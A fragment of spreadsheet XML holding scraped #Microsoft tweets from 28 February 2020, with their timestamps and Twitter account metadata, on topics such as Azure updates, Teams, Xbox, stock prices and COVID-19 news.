    <t>The Brokers at GSIMarkets whould like to inform you that: Microsoft Corp (MSFT) stock rose by 2.4213%! Currently priced at 162.01. https://t.co/TmbeSjmU8x #Microsoft #MSFT #Stocks #Stockprices #GSIMarkets</t>
  </si>
  <si>
    <t>Fri Feb 28 23:25:53 +0000 2020</t>
  </si>
  <si>
    <t>Since Corona #COVID19 is almost everywhere businesses should push for teleworking ie. work from home and for that @MicrosoftTeams is the solution to go to in order to keep the business running while employees are safe... #Microsoft</t>
  </si>
  <si>
    <t>{'id': 198427943, 'id_str': '198427943', 'name': 'Ghassan Chahine', 'screen_name': 'Gusc', 'location': 'Beirut', 'description': 'My tweets reflect my own point of view.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 495, 'friends_count': 373, 'listed_count': 31, 'created_at': 'Mon Oct 04 08:28:20 +0000 2010', 'favourites_count': 1491, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3480,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'http://pbs.twimg.com/profile_images/1024012735317782539/PY2Bw98M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024012735317782539/PY2Bw98M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/198427943/1478451933',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</si>
  <si>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23:20:47 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 23:20:46 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 23:20:14 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 23:20:11 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 23:20:01 +0000 2020</t>
  </si>
  <si>
    <t>Opinionby @ProfKOsenga
The @FTC said it would look more closely at #Amazon, #Apple, #Facebook, #Microsoft and #Google.
This move represents a substantial step forward in addressing, anticompetitive aspects of #BigTech that have been going on for years. https://t.co/jK8zHCFcBh</t>
  </si>
  <si>
    <t>{'id': 1217213360846069760, 'id_str': '1217213360846069760', 'name': 'Epoch Times Opinion', 'screen_name': 'EpochOpinion', 'location': 'New York City', 'description': 'Opinion content of The Epoch Times. Read more: https://t.co/8jHAGM4dGJ', 'url': 'https://t.co/zlp9vwugV4', 'entities': {'url': {'urls': [{'url': 'https://t.co/zlp9vwugV4', 'expanded_url': 'http://www.theepochtimes.com', 'display_url': 'theepochtimes.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8jHAGM4dGJ', 'expanded_url': 'https://www.theepochtimes.com/c-opinion', 'display_url': 'theepochtimes.com/c-opinion', 'indices': [47, 70]}]}}, 'protected': False, 'followers_count': 559, 'friends_count': 44, 'listed_count': 8, 'created_at': 'Tue Jan 14 22:34:36 +0000 2020', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 374, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217213595513126913/5OouWXeg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217213595513126913/5OouWXeg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1217213360846069760/1579041612',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</si>
  <si>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23:13:29 +0000 2020</t>
  </si>
  <si>
    <t>Yaay, I just passed the BETA Microsoft Power Platform fundamentals (PL-900) exam for Microsoft Certified: Power Platform Fundamentals #microsoft  #powe #powerplatform  #passed  #fundamentals  #certification  #certifications https://t.co/zHdBNnBpGD</t>
  </si>
  <si>
    <t>Fri Feb 28 23:05:57 +0000 2020</t>
  </si>
  <si>
    <t>If #Google / #Microsoft had hired #linguists to write rule-based machine translation systems, they could by now have had 98% correct systems for all their languages, domain-independent.</t>
  </si>
  <si>
    <t>{'id': 35834642, 'id_str': '35834642', 'name': 'Tino Didriksen', 'screen_name': 'TinoDidriksen', 'location': 'Odense, Denmark', 'description': 'Remember how overpowered Paladins were in Master of Magic? Good times, good times...', 'url': 'https://t.co/bJt4FJwxUH', 'entities': {'url': {'urls': [{'url': 'https://t.co/bJt4FJwxUH', 'expanded_url': 'https://tinodidriksen.com/', 'display_url': 'tinodidriksen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 21, 'listed_count': 2, 'created_at': 'Mon Apr 27 19:32:33 +0000 2009', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 751,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'http://pbs.twimg.com/profile_images/747885018362576896/88dCOFXc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/747885018362576896/88dCOFXc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35834642/1439155620', 'profile_link_color': '679B3D',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</si>
  <si>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23:05:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's Office app that replaces Word, Excel, and PowerPoint hits general availability 
#x10Networks #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1663874838, 'id_str': '1663874838', 'name': 'X10 Networks', 'screen_name': 'X10Networks', 'location': 'Canada', 'description': 'Advanced Next Generation Communications Network Solutions', 'url': 'https://t.co/xauFbHSASD', 'entities': {'url': {'urls': [{'url': 'https://t.co/xauFbHSASD', 'expanded_url': 'http://www.x10networks.com', 'display_url': 'x10networks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 205, 'listed_count': 37, 'created_at': 'Mon Aug 12 02:02:22 +0000 2013', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1732,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'http://pbs.twimg.com/profile_images/1228405790542721024/gUasYsNi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228405790542721024/gUasYsNi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1663874838/1581709738', 'profile_link_color': 'B33F00',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</si>
  <si>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23:03:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Xbox what the fuck is this update https://t.co/n9woH3mVM8</t>
  </si>
  <si>
    <t>{'id': 817913864394276864, 'id_str': '817913864394276864', 'name': '((Judgmental Crow))', 'screen_name': 'Crowdotmp4', 'location': 'Hot Takes here vvv', 'description': 'Male / unpopular opinions about everything / #freehongkong /', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 1278, 'listed_count': 0, 'created_at': 'Sun Jan 08 02:00:36 +0000 2017', 'favourites_count': 23568, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11756,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'http://pbs.twimg.com/profile_images/1099584690430857217/-I1R2KR6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099584690430857217/-I1R2KR6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/817913864394276864/1563931111',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</si>
  <si>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23:02:53 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft kills all third-party skills as it refocuses Cortana for the enterprise 
#X10networks  #microsoft #AI https://t.co/LHr25pbCZa</t>
  </si>
  <si>
    <t>Fri Feb 28 23:02:50 +0000 2020</t>
  </si>
  <si>
    <t>7 things #Microsoft didn't tell us about the new #Office app https://t.co/WHYbJR6tGG via @computerworld</t>
  </si>
  <si>
    <t>Fri Feb 28 23:00:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Defender ATP for #Linux is coming... https://t.co/pzrdASEu33</t>
  </si>
  <si>
    <t>Fri Feb 28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</si>
  <si>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https://t.co/3aANXcnTLe</t>
  </si>
  <si>
    <t>Fri Feb 28 22:57:02 +0000 2020</t>
  </si>
  <si>
    <t>You ready for 100s of new features in #Microsoft's Wave 1 set of updates for Dynamics 365 CRM and ERP and Power Platform? I am! @ZDNet #cdwsocial https://t.co/pXvi3ZO8Fy</t>
  </si>
  <si>
    <t>{'id': 15487280, 'id_str': '15487280', 'name': 'Lynn Saratore', 'screen_name': 'LynnSaratore', 'location': 'Chicago', 'description': 'Sr. Recruiter at CDW,  previously Sr. Recruiter @ Hewitt and Staffing Manager @ Bank of America', 'url': 'https://t.co/yZd0VhUekn', 'entities': {'url': {'urls': [{'url': 'https://t.co/yZd0VhUekn', 'expanded_url': 'http://www.linkedin.com/in/lynnsaratore', 'display_url': 'linkedin.com/in/lynnsaratore', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1718, 'friends_count': 3317, 'listed_count': 134, 'created_at': 'Fri Jul 18 22:30:31 +0000 2008', 'favourites_count': 4707, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20557,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'http://pbs.twimg.com/profile_images/1009412971888508929/uuULjEda_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009412971888508929/uuULjEda_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15487280/1496973910',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</si>
  <si>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22:55:04 +0000 2020</t>
  </si>
  <si>
    <t>While #Microsoft's goals to reduce the #carbon in new construction is laudable - reinvigorating their #existingbuilding stock is the most carbon-friendly choice.  https://t.co/GZ4Ontc0kb</t>
  </si>
  <si>
    <t>{'id': 1683400422, 'id_str': '1683400422', 'name': 'Julia Craighill', 'screen_name': 'JuliaCraighill', 'location': 'Chevy Chase, MD', 'description': 'Providing pragmatic guidance for #greenbuilding #BREEAM and #greenbusiness. Founder of Ensight Consulting.', 'url': 'http://t.co/A27mbjgIBf', 'entities': {'url': {'urls': [{'url': 'http://t.co/A27mbjgIBf', 'expanded_url': 'http://www.ensightconsult.com', 'display_url': 'ensightconsult.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 234, 'friends_count': 432, 'listed_count': 9, 'created_at': 'Mon Aug 19 14:41:24 +0000 2013', 'favourites_count': 579, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 980,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'http://pbs.twimg.com/profile_images/940282536759922688/NIyt1nQu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/940282536759922688/NIyt1nQu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1683400422/1420140701',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</si>
  <si>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22:50:45 +0000 2020</t>
  </si>
  <si>
    <t>Open Office 2020 Software Suite for Microsoft Windows for Home and Student CD #2020 #Home #Microsoft #office #Open #Software #Student #Suite #Windows https://t.co/K209MFoRsl</t>
  </si>
  <si>
    <t>Fri Feb 28 22:49:08 +0000 2020</t>
  </si>
  <si>
    <t>Bitcoin Mixing, Stolen Identities and Fake Tax Returns Used to Defraud Microsoft of More Than $10 Million
https://t.co/bT3gKTZHBQ
#Cryptocurrency #CryptoInvestor #CryptoNews #CryptoLove #Coindesk #eth #btc #xrp #Binance #Bittrex #Gemini #Blockchain #CryptoExchanges #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:47:11 +0000 2020</t>
  </si>
  <si>
    <t>Get Ready to train  Enroll today to become a Certified Trainer approved by #Microsoft at the #1 Leader in Online Training Certification Instructions #PrepMasters USA - https://t.co/cVkaPu7HDg https://t.co/2lgGrWlQf0</t>
  </si>
  <si>
    <t>Fri Feb 28 22:46:30 +0000 2020</t>
  </si>
  <si>
    <t>Stay organized with #Microsoft Nimble. https://t.co/owJ91vDhFx #tech</t>
  </si>
  <si>
    <t>Fri Feb 28 22:46:04 +0000 2020</t>
  </si>
  <si>
    <t>Are you ready for an app launch!!!! Launching soon #applaunch #MicrosoftAfrica #MicrosoftAzure #microsoftpartner #Microsoft #unilyqn https://t.co/kdK6tLpyyQ</t>
  </si>
  <si>
    <t>{'id': 1045260000766152704, 'id_str': '1045260000766152704', 'name': 'Zlitch Technologies Ltd', 'screen_name': 'ZlitchTech', 'location': 'Accra, Ghana', 'description': 'Zlitch(Zero gLITCH) is a Tech start-up specialized in delivering IT and engineering products, solutions and training. #UnilynQ #ZlitchTech', 'url': 'https://t.co/RWBVad6j9Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/RWBVad6j9Z', 'expanded_url': 'http://www.zlitch.com', 'display_url': 'zlitch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 136, 'listed_count': 0, 'created_at': 'Thu Sep 27 10:32:58 +0000 2018', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 55, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1045261071886569472/mrFDLc9E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045261071886569472/mrFDLc9E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1045260000766152704/1538050939',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</si>
  <si>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22:39:12 +0000 2020</t>
  </si>
  <si>
    <t>The February 28th Weekly Roundup is Posted! https://t.co/4h8WPBUPWF #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:35:04 +0000 2020</t>
  </si>
  <si>
    <t>Well this will be handy! Cloud based print servers.
#Microsoft #Azure #Printing #PrintServer
https://t.co/hIhaKlc72q</t>
  </si>
  <si>
    <t>Fri Feb 28 22:30:04 +0000 2020</t>
  </si>
  <si>
    <t>"We need to have diversity in more management and leadership positions because diversity attracts diversity."  #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode https://t.co/sD2mzpVwsm</t>
  </si>
  <si>
    <t>Fri Feb 28 22:24:15 +0000 2020</t>
  </si>
  <si>
    <t>.NET Framework February 2020 Preview of Quality Rollup https://t.co/lCKpcgQSok #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:23:36 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Were retiring some Azure Site Recovery support options on March 1, 2023 https://t.co/xEXmaGS5Cq #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022 https://t.co/472UCswnhg #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Virtual Network service endpoint policies feature is now available https://t.co/f31vkYUEIi #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Site Recovery data encryption feature will be retired April 30, 2022 https://t.co/YBsDn4vW5w #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Load Balancer TCP resets on idle timeout is now available https://t.co/hoK8qKeswe #Microsoft</t>
  </si>
  <si>
    <t>#Azure A8  A11 Azure Virtual Machine sizes will be retired on March 1, 2021 https://t.co/ugqHBDKLyK #Microsoft</t>
  </si>
  <si>
    <t>#Azure Preview a fully parsed YAML document without running the pipeline https://t.co/CMtBi2vnbs #Microsoft</t>
  </si>
  <si>
    <t>#Azure We are retiring Azure AD Domain Services classic VNET support on March 1, 2023 https://t.co/jPddbeoQQC #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:21:38 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Accelerate Your cloud strategy with Skytap on Azure https://t.co/AIruyH3DpD #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:21:37 +0000 2020</t>
  </si>
  <si>
    <t>#Azure ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/QQmeNjtCEg #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/AqZjUt5JA6 #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Cost Management + Billing updates  February 2020 https://t.co/EhFqo1sv0H #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 22:19:07 +0000 2020</t>
  </si>
  <si>
    <t>I've scraped stuff off my shoe that's of higher quality than the #Microsoft god-awful Intune Company Portal app. #MicrosoftTeams is just as bad too.
And yes, I do have a dog and occasionally step on his "land mines" out in the yard... difference is those land mines fertilize.</t>
  </si>
  <si>
    <t>Fri Feb 28 22:17:17 +0000 2020</t>
  </si>
  <si>
    <t>Amazing stream today! Please consider checking it out link in bio!
#mixer #mixercommunity #mixerstreamer #streamer #smallstreamer #apexlegends #apexchampion #apexlegendsclips #mirage #bamboozle #bamboozled #twitch #gaming #gamer   #game #gamers #gamingclips #Xbox #microsoft https://t.co/IPMbNULl2P</t>
  </si>
  <si>
    <t>{'id': 1136001057191006209, 'id_str': '1136001057191006209', 'name': 'KingCrawDaddy', 'screen_name': 'KingCrawDaddy88', 'location': 'Da Swamp', 'description': 'love gaming hoping to spread good vibes and dubs follow me on mixer at https://t.co/ENXbBK36Fd', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/ENXbBK36Fd', 'expanded_url': 'https://mixer.com/KingCrawDaddy', 'display_url': 'mixer.com/KingCrawDaddy', 'indices': [71, 94]}]}}, 'protected': False, 'followers_count': 136, 'friends_count': 53, 'listed_count': 2, 'created_at': 'Tue Jun 04 20:05:32 +0000 2019', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 327, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1136004420095922177/ZJ8JGFIt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136004420095922177/ZJ8JGFIt_normal.jpg',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</si>
  <si>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22:15:01 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Hackers Use Windows 10 RDP ActiveX Control to Run TrickBot Dropper:" https://t.co/xSdxJ2C96r
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 22:14:30 +0000 2020</t>
  </si>
  <si>
    <t>When you're reading up on debugging in JavaScript get sidetracked and npm install Typescript but have to update your system policy's first...
#JavaScript #TypeScript #webdev #CodeNewbie #Microsoft
#VSCode https://t.co/UldVVUyMD6</t>
  </si>
  <si>
    <t>{'id': 1201341127116197889, 'id_str': '1201341127116197889', 'name': 'The Dutchess of Mild Anxiety', 'screen_name': 'ryanthemaddev', 'location': 'Washington', 'description': 'she/her\nWeb Developer, Designer, Musician, Writer, Mom and #wot enthusiast. Sitter of the #TealAjah', 'url': 'https://t.co/hWSxcnymT0', 'entities': {'url': {'urls': [{'url': 'https://t.co/hWSxcnymT0', 'expanded_url': 'http://ryan.allmaddesigns.com/', 'display_url': 'ryan.allmaddesigns.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 310, 'friends_count': 306, 'listed_count': 3, 'created_at': 'Mon Dec 02 03:23:47 +0000 2019', 'favourites_count': 20078, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2865, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201341225283883008/V4h2j0Qx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201341225283883008/V4h2j0Qx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1201341127116197889/1576790696',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</si>
  <si>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22:10:32 +0000 2020</t>
  </si>
  <si>
    <t>I hope the outbreak of the Coronavirus won't delay #Microsoft and #Sony launch their newest next generation Consoles late this year, I will be devastated if there's a delay on #PlayStation5 and #XboxOneSeriesX Launch.
#Wuhan #China #COVID19 #Coronavirus #Pandemic #WHO #E32020</t>
  </si>
  <si>
    <t>{'id': 241410022, 'id_str': '241410022', 'name': 'David Li', 'screen_name': 'Dave2307', 'location': 'Sydney Australia', 'description': 'David/Dave, 32 years old, From Sydney Australia, Loves to Travel, Photography, Music, Partying, Left Wing Politics, Watching Movies and Playing Video Games.', 'url': 'https://t.co/7YU3ssG1hC', 'entities': {'url': {'urls': [{'url': 'https://t.co/7YU3ssG1hC', 'expanded_url': 'http://www.facebook.com/davidli8723', 'display_url': 'facebook.com/davidli8723', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 708, 'friends_count': 786, 'listed_count': 10, 'created_at': 'Sat Jan 22 05:28:09 +0000 2011', 'favourites_count': 293, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4249, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF9901', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1000749794338328576/9kXJhw2C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1000749794338328576/9kXJhw2C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/241410022/1456405503', 'profile_link_color': 'DE7013', 'profile_sidebar_border_color': 'FDC946', 'profile_sidebar_fill_color': 'FDC946', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 22:08:17 +0000 2020</t>
  </si>
  <si>
    <t>First month without updates and in #Windows10Mobile nothing starts working anymore, as I expected. #Microsoft #Lumia</t>
  </si>
  <si>
    <t>Fri Feb 28 22:07:57 +0000 2020</t>
  </si>
  <si>
    <t>I stole it...  
#sorrynotsorry #robbed #superkiller 
#crucible #pvp #6v6 #warlock #hunter #titan #destiny2 #d2 #bungie #microsoft #xbox #playstation #pc #fps #gaming #gamer #contentcreator #youtube #linkinbio https://t.co/4j6828qiZL</t>
  </si>
  <si>
    <t>Fri Feb 28 22:07:34 +0000 2020</t>
  </si>
  <si>
    <t>'Developers have lost hope #Microsoft will do the right thing'... Redmond urged to make WinUI cross-platform  via @TheRegister https://t.co/FIoJaAc4T1</t>
  </si>
  <si>
    <t>{'id': 51028164, 'id_str': '51028164', 'name': 'ðŸ”¥ ÑÑ”Î±â„“Î¹Ñ•Ñ‚ × Î±Î½Ñ•Ñ‚Î±Ð½ ðŸ”¥', 'screen_name': 'RHJOfficial', 'location': 'North West, England', 'description': 'Father &amp; Husband - Web Developer - Developing in WordPress / Magento / Shopify / Umbraco / Laravel / 22/12/2016 ðŸ’/ 29/08/2018 ðŸ‘ª', 'url': 'https://t.co/OhIsYi13rO', 'entities': {'url': {'urls': [{'url': 'https://t.co/OhIsYi13rO', 'expanded_url': 'https://www.mjcoder.co.uk/', 'display_url': 'mjcoder.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2681, 'friends_count': 2145, 'listed_count': 612, 'created_at': 'Fri Jun 26 11:56:15 +0000 2009', 'favourites_count': 17462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 245233,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'http://pbs.twimg.com/profile_images/951153488779792384/3oeF2PoF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/951153488779792384/3oeF2PoF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/51028164/1541152580',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</si>
  <si>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22:05:10 +0000 2020</t>
  </si>
  <si>
    <t>Updates for #Windows 10 Always On #VPN to improve connection reliability. #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/rihRySV9NF</t>
  </si>
  <si>
    <t>Fri Feb 28 22:04:34 +0000 2020</t>
  </si>
  <si>
    <t>#TechNews
Coronavirus jolts tech firms: Facebook cancels F8 conference; Microsoft, Apple warn
Read the full story here:
https://t.co/01KhiHjEv9
Source: https://t.co/8mJSMqXLjk
#technology #trendingnews #NewsToday #cnet #coronavirus #Facebook #F8conference #Microsoft #Apple https://t.co/wXpCRIRRhx</t>
  </si>
  <si>
    <t>Fri Feb 28 22:04:21 +0000 2020</t>
  </si>
  <si>
    <t>Is your team ready to #upgrade from @Skype for Business to @MicrosoftTeams? Check out our newest #blog to help kick-start the transition https://t.co/q4Tra5MVKV. #BPTech #Teams #Microsoft #MSFT https://t.co/j2jujv4JFI</t>
  </si>
  <si>
    <t>{'id': 1394746741, 'id_str': '1394746741', 'name': 'Blueprint Technologies', 'screen_name': 'bpcs_tech', 'location': 'Bellevue, WA.', 'description': 'Blueprint is a nationwide #technology solutions firm that connects strategy, product and delivery. Follow for hot jobs and cool tech! ðŸ”¥', 'url': 'https://t.co/09rkcZbbWV', 'entities': {'url': {'urls': [{'url': 'https://t.co/09rkcZbbWV', 'expanded_url': 'http://www.bpcs.com', 'display_url': 'bpcs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 536, 'friends_count': 1278, 'listed_count': 40, 'created_at': 'Wed May 01 14:08:17 +0000 2013', 'favourites_count': 951, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1539, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '383585', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1157370568871538688/KvABBq0i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157370568871538688/KvABBq0i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1394746741/1519067189', 'profile_link_color': '364B9E',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</si>
  <si>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Fri Feb 28 22:04:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's latest Edge browser (beginning with v. 80.0.338.0) adds feature that blocks downloads of unwanted apps https://t.co/u17YZVwhph #Microsoft #EdgeBrowser https://t.co/5YInc6AeYZ</t>
  </si>
  <si>
    <t>Fri Feb 28 22:03:07 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Microsoft and Epic Games Latest Game Developers to Drop out of GDC - IGN - IGN #powertothemaker #microsoft #IGN #EpicGames https://t.co/bPHWQ8lAkr https://t.co/NU4MyezhN8</t>
  </si>
  <si>
    <t>{'id': 773568714843258882, 'id_str': '773568714843258882', 'name': 'Gamesmith', 'screen_name': 'GameSmith_Inc', 'location': 'United States', 'description': 'Join the top vetted digital entertainment professionals community with over 12,000 members, titles and companies. ðŸŽ® ðŸŒ', 'url': 'https://t.co/wsJ6R0W8Mh', 'entities': {'url': {'urls': [{'url': 'https://t.co/wsJ6R0W8Mh', 'expanded_url': 'http://gamesmith.com', 'display_url': 'gamesmith.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 268, 'friends_count': 1913, 'listed_count': 8, 'created_at': 'Wed Sep 07 17:08:48 +0000 2016', 'favourites_count': 252, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 334,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'http://pbs.twimg.com/profile_images/1027931730118959105/eyl54a4L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027931730118959105/eyl54a4L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773568714843258882/1580992231',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</si>
  <si>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22:03:06 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Microsoft and Epic Games Latest Game Developers to Drop out of GDC - IGN - IGN #powertothemaker #microsoft #IGN #EpicGames https://t.co/9QRbFk1bLp https://t.co/a97joq7PXJ</t>
  </si>
  <si>
    <t>{'id': 384530883, 'id_str': '384530883', 'name': 'Alex Churchill', 'screen_name': 'VcChurchill', 'location': 'San Francisco', 'description': 'CEO and founder of Gamesmith inc.', 'url': 'https://t.co/Lems6hqCuN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lems6hqCuN', 'expanded_url': 'http://www.Gamesmith.com', 'display_url': 'Gamesmith.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 297, 'listed_count': 22, 'created_at': 'Mon Oct 03 21:15:07 +0000 2011', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 334,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'http://pbs.twimg.com/profile_images/783866384207851520/vGhG3TSw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/783866384207851520/vGhG3TSw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/384530883/1466787819', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 22:00:58 +0000 2020</t>
  </si>
  <si>
    <t>JavaScript Functions  All You Need to Know Pt.2
#API #NodeJS #VueJS #301DaysOfCode #Linux #Microsoft #Mobile #Android #iOS #web #100DaysOfCode #Programming #JavaScript
https://t.co/Y0MSAtHYYg via @alexdevero</t>
  </si>
  <si>
    <t>Fri Feb 28 22:00:41 +0000 2020</t>
  </si>
  <si>
